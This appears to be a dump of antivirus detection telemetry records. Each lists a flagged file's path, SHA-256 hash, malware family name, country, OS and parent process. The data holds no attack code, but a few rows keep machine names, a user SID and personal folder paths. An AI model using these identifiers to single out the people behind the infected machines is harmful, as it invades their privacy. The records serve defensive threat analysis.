  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes73\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='cda2c430ab5a662b70c25f640f2ad44194a5dfbc9c98580242508f6cec75209c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe803_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe803 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:44:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reg.exe', filepath='E:\\WINDOWS\\ServicePackFiles\\i386\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='c25885025ed1fb4fece528f2b389ba3ddf327efea3752a0b41b54cc17c0b9d8a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='djkdc.exe', filepath='c:\\users\\X\\appdata\\roaming\\djkdc.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:31:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\redkingsmpp\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\redkingsmpp\\mppoker.exe', parentsize=1214712, timestamp='2018-11-02T21:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta _vc.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\GTA _VC\\GTA _VC.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e41b2c6c7ef4e6b36ce172589c39ef92ce0c73b6bf4b0e29a72be285a2f0ef42', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aasfgqf.exe', filepath='c:\\users\\X\\appdata\\roaming\\aasfgqf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141612-7c30953e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_43862836\\AVSCAN-20181102-141211-4F406CFD\\AVSCAN-20181102-141612-7C30953E', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M1.#R1'), hash='a667a34467481b7425b4838c314748951a998afb989caa8f4954c7f6a74d010d', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:16:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7cfb778aae830ce9b4b472a0011dbf5d232d49c8b6dca586593e248b887c8f02.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\7CFB778AAE830CE9B4B472A0011DBF5D232D49C8B6DCA586593E248B887C8F02.VIR', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='7cfb778aae830ce9b4b472a0011dbf5d232d49c8b6dca586593e248b887c8f02', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T11:02:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\733E354C150B4149737AE67AFD29DC8E971759219779881F1F0375C6118FB5B9', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:23:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{28620631-07A5-4D83-A9F5-A4C8E9AFE439} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-02T12:24:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\71E4D9ACE1C4D19F9A8F0031C846F836378F2EA069B5133A0CE41A45F4917180', filesize=52000, name='HTML/ExpKit.Gen2.#M1.#R1'), hash='71e4d9ace1c4d19f9a8f0031c846f836378f2ea069b5133a0ce41a45f4917180', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:19:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202313-efa89dff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40bae418\\AVSCAN-20181102-200324-7357C59E\\AVSCAN-20181102-202313-EFA89DFF', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T12:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='880c8d9b62074a973ace4e3d95fe2d402a63943afe4366bf95cd0b11f5ef75f1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\880C8D9B62074A973ACE4E3D95FE2D402A63943AFE4366BF95CD0B11F5EF75F1', filesize=2048000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='880c8d9b62074a973ace4e3d95fe2d402a63943afe4366bf95cd0b11f5ef75f1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:20:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cycclient.exe', filepath='D:\\掃瞄資料\\804\\CycClient.exe', filesize=12800000, name='W32/Alman.BB.#M1.#R1'), hash='abf5101cde7d9a1c21fe01498a6e987af6a9078c46767e354e99ef3ce98ff7fd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:13:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203638-32e6b95b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9194ec95\\AVSCAN-20181102-203344-1EB21306\\AVSCAN-20181102-203638-32E6B95B', filesize=1536000, name='TR/BitCoinMiner.pjgxk.#M1.#R1'), hash='74e02287cc36a0375824ecd2d74912d7be34c03a7fab4dcca8ed0ec38bef6eec', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:36:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.kjvwd.#M0.#R0'), hash='e6fc333e96f2bf01b233da4c04eb648168ec1f8b12f53c11b61c24579404b6c8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:39:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082012-c4bd8abe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-082012-C4BD8ABE', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_2a527143.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_2a527143.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='launcher.exe', filepath='C:\\Users\\X\\Downloads\\client\\launcher.exe', filesize=2496000, name='HEUR/AGEN.1024324.#M1.#R1'), hash='ffee224f9f3581b42774a9280783e15853f4375110eb991c9d5f3c976456bac1', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:fvG4TjybbU6VJ\\\\\\/kD.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T00:01:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-015618-f37e3e52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-015618-F37E3E52', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='dd6d2263d3262b60fe6e2a0be799ed305ae3a09787cb8a6182fbeb48e4c630b9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:58:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ad87d6f4c2b97c8f36045253a9c3e13d03c61db5dd751c46bbd60bcdf511e494', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T12:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsf792.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Fotor3_3.4.1_163.15_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T13:20:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\5zoafijxs1j\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:24:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='beforeghost.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\BeforeGhost.exe", filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='E:\\Software\\Office 2007\\Office.en-us\\dwtrig20.exe', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-02T03:12:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbr.exe', filepath='D:\\STIKES\\Pak Pri\\Master\\Nero 6 Ultra Edition\\nero backitup\\NBR.EXE', filesize=1024000, name='TR/Patched.Gen.#M300.#R2947'), hash='f58d55ed86ae20c659fcc96b4548d748e29f9e27d558f75d904d6e8338eda0b8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T04:43:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dx-ball_2_classic_pack_install.exe', filepath='\\\\Gilles-pc\\d\\Jeux\\DX-Ball_2_Classic_Pack_Install.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3351'), hash='b97aa27eb3dd4abce9535c6fa5f5c41cce6fe14a47ad2d4fc3f653305fae10dd', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T14:22:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064845-4be880f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064845-4BE880F1', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-201852-a222103b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-201852-A222103B', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210031-5cc0b308', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb77e4c9\\AVSCAN-20181104-210000-5960DD46\\AVSCAN-20181104-210031-5CC0B308', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (4).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (4).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline='\\\\\\/FromInstall', country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Auslogics\\Anti-Malware\\AntiMalware.exe', parentsize=1906248, timestamp='2018-11-04T18:58:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135353-8f36e7ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135353-8F36E7AD', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002977bb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002977bb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:49:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='30_asd_02_symbols33.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Macromedia\\Flash MX\\Help\\Flash\\html\\30_asd_02_symbols33.html', filesize=332000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b969553818d7b1a9081ec2355798048f5b1410113b76a58febe22f31873c614a', metadata=Row(cmdline=None, country='NP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:05:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151623-43e207c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151623-43E207C2', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:16:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='object', filepath='object', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:45:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:32:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T14:16:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-11-04-180050/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:56:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spnativemessage.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Surfing Protection\\SPNativeMessage.exe', filesize=1460000, name='W32/Neshta.A.#M1.#R1'), hash='fd862b80b8e984b8872cb4e0e7e7429551b1aab5f28c152edaa0beb4538628ba', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\Malwarebytes Antimalware\\MalwareBytes Anti-Malware Keygen v1.7 URET\\MalwareBytes Anti-Malware Keygen v1.7 URET.exe', parentsize=575104, timestamp='2018-11-04T15:40:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msmdownloadtool.exe', filepath='C:\\Users\\X\\Desktop\\oppo a71\\CPH1801EX_11_A.01_171230\\MsmDownloadTool.exe', filesize=22812000, name='W32/Ramnit.C.#M1.#R1'), hash='ed1a0b7c77cde353e315572d6bb1d972bd2bf2223e28376444a69223b99318ad', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe29_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe29 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:03:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e2efb922dde4c52bb16c8068257aac7cd3b3926c29bdf5819e886386e4753e58', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\E2EFB922DDE4C52BB16C8068257AAC7CD3B3926C29BDF5819E886386E4753E58', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e2efb922dde4c52bb16c8068257aac7cd3b3926c29bdf5819e886386e4753e58', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:22:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153434-abdb35bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-153434-ABDB35BC', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:34:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:37:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spideypc.exe', filepath='\\\\?\\H:\\العاب\\اسبيدر مان\\SpideyPC.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='fe9cbee1d403ebb36d0cd09269e02b18f88413538742cec93c5183af6895ab84', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000048c3', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2216\\tmp00000187\\tmp000048c3', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='\\\\\\/service', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\N-able Technologies\\AVDefender\\epsecurityservice.exe', parentsize=452944, timestamp='2018-11-01T15:51:41Z'), dt=datetime.date(2018, 11, 1))],
